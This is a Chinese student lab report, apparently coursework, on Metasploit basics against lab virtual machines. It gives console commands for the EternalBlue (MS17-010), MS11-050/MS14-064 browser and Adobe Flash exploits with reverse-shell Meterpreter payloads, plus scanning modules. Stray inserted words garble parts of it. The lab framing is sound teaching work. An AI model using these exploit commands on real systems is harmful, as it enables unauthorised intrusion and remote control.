2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
实践使用漏洞和辅助模块
任务一:MS17-010安全漏洞
任务二:(1)MS11-050(失败)(2)MS14-064(惟一)
任务三:abode_flash_avm2
辅助模块:(1)ARP扫描模块(惟一)(2)auxiliary/scanner/smb/smb_ms17_010 (扫描靶机是否会被此漏洞攻击)(3)nmap扫描靶机开放端口(惟一)
实践要求与问题回答
1. 实践内容(3.5分)
本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分html
问题回答
用本身的话解释什么是 exploit , payload , encode.
exploit: 设至关于利用漏洞打开的通道,将作好的木马病毒等顺利传输到靶机。
payload: 简单来讲就是病毒代码包装成一个可执行的文件(任意指定类型),而后经过通道传输为获取靶机权限作准备。
encode: 针对payload进行编码,改变payload代码特征(例如不出现“0x00”的特殊机器码等),可是不改变payload为咱们所用的特征,能对payload进行加工。shell
实践过程
本次实践所用的辅助功能及漏洞:nmap扫描,auxiliary辅助模块,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2
1、Windows服务渗透攻击——MS17-010安全漏洞
(1)打开MSF输入nmap -O -Pn 192.168.239.129
(2)利用auxiliary辅助模块进行扫描:
msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129 msf auxiliary(scanner/smb/smb_ms17_010) > run
(3)根据要求设置并攻击:
输入back退回,而后依次输入:windows
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.239.131 set RHOST 192.168.239.129 exploit
2、浏览器渗透攻击——MS11-050/MS14-064
(1)
打开MSF,依次输入:浏览器
use windows/browser/ms11_050_mshtml_cobjectelement set payloadwindows/meterpreter/reverse_http set LHOST 192.168.239.131 set LPORT 5313 exploit
在靶机上打开生成的URL,发现报错,猜想多是漏洞和IE版本问题
安全
(2)从新选择:
主要步骤和(1)中大体相同,就是修改一下调用的名称。注意:须要添加的指令AllowPowershellprompt---true并将http连接改为tcp连接
网络
生成URL并开启监听服务:
session
靶机打开IE浏览器,输入网址:
tcp
攻击机回连成功,输入sessions -i获取对话:
编码
3、针对Adobe Reader软件的渗透攻击——abode_flash_avm2
(1)生成PDF文件没有成功(上一届学长学姐的经验并很差用)
(2)利用abode_flash_avm2攻击:
(1)输入search abode
spa
(2)根据要求进行配置:
use exploit/windows/browser/abode_flash_avm2 set srvhost 192.168.239.131 set lhost 192.168.239.131 set payloadwindows/meterpreter/reverse_tcp
(3)在靶机里下载adobe_flash_11。
(4)输入exploit:
(5)在靶机里登陆生成出来的地址:
(6)获取权限:
4、辅助模块——ARP扫描模块
网络安全协议中曾经讲到过ARP欺骗,因而我便尝试了ARP扫描
(1)seach寻找模块:
(2)根据要求配置:
第一次扫描的是一个网段(设置及结果以下):
第二次扫描靶机:
实践总结及体会
本次试验在我看来为漏洞寻找合适的靶机是一件很费时间的事情,须要足够的耐心,第二就是如何正确利用MSF的辅助功能为攻击作好铺垫,仍然须要大量反复的实践,否则所掌握的东西仅仅知识一点点皮毛而已。同时我发现想要利用一个漏洞进行攻击也不是一件容易的事情,由于一个漏洞不可能对全部状况都适用,因此攻击方不只仅是要找合适的漏洞,也要为漏洞找合适的机器或程序。矛和盾的较量看来还要持续好久好久。
- 1. 2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
- 2. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
- 3. 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
- 4. 2017-2018-2 20155203《网络对抗技术》Exp5 MSF基础应用
- 5. 2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
- 6. 2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
- 7. 20155308『网络对抗技术』Exp5 MSF基础应用
- 8. 2017-2018-2 20155204《网络对抗技术》EXP5 MSF基础应用
- 9. 2018-2019-2 20165330《网络对抗技术》Exp5 MSF基础应用
- 10. 2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用
- 更多相关文章...
- • 网站主机 技术 - 网站主机教程
- • 互联网系统应用架构基础分析 - 红包项目实战
- • TiDB 在摩拜单车在线数据业务的应用和实践
- • Docker容器实战(一) - 封神Server端技术
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. Duang!超快Wi-Fi来袭
- 2. 机器学习-补充03 神经网络之**函数(Activation Function)
- 3. git上开源maven项目部署 多module maven项目(多module maven+redis+tomcat+mysql)后台部署流程学习记录
- 4. ecliple-tomcat部署maven项目方式之一
- 5. eclipse新导入的项目经常可以看到“XX cannot be resolved to a type”的报错信息
- 6. Spark RDD的依赖于DAG的工作原理
- 7. VMware安装CentOS-8教程详解
- 8. YDOOK:Java 项目 Spring 项目导入基本四大 jar 包 导入依赖,怎样在 IDEA 的项目结构中导入 jar 包 导入依赖
- 9. 简单方法使得putty(windows10上)可以免密登录树莓派
- 10. idea怎么用本地maven
- 1. 2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
- 2. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
- 3. 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
- 4. 2017-2018-2 20155203《网络对抗技术》Exp5 MSF基础应用
- 5. 2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
- 6. 2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
- 7. 20155308『网络对抗技术』Exp5 MSF基础应用
- 8. 2017-2018-2 20155204《网络对抗技术》EXP5 MSF基础应用
- 9. 2018-2019-2 20165330《网络对抗技术》Exp5 MSF基础应用
- 10. 2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用